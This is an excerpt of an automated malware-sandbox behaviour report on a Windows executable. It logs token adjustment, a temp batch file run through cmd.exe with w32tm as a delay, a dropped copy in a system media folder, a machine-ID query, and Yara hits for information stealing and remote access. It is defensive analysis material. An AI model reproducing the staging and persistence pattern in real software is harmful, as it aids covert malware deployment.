Source: w32tm.exe, 00000009.00000002.1738132193.00000180BDA07000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wRRcPdViqk.exe, 0000000B.00000002.1720190148.000000001B501000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\eE9QbXcUOX.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\Media\Sonata\wRRcPdViqk.exe "C:\Windows\Media\Sonata\wRRcPdViqk.exe" Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Queries volume information: C:\Users\user\Desktop\QT4aLb3P98.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Queries volume information: C:\Windows\Media\Sonata\wRRcPdViqk.exe VolumeInformation Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Queries volume information: C:\Windows\Media\Sonata\wRRcPdViqk.exe VolumeInformation Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Queries volume information: C:\Windows\Media\Sonata\wRRcPdViqk.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: 00000000.00000002.1687936780.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1818454348.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1716375349.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1687936780.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1774437286.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1688308009.000000001327F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: QT4aLb3P98.exe PID: 6872, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wRRcPdViqk.exe PID: 5696, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wRRcPdViqk.exe PID: 5104, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wRRcPdViqk.exe PID: 7252, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000000.00000002.1687936780.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1818454348.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1716375349.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1687936780.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1774437286.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1688308009.000000001327F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: QT4aLb3P98.exe PID: 6872, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wRRcPdViqk.exe PID: 5696, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wRRcPdViqk.exe PID: 5104, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wRRcPdViqk.exe PID: 7252, type: MEMORYSTR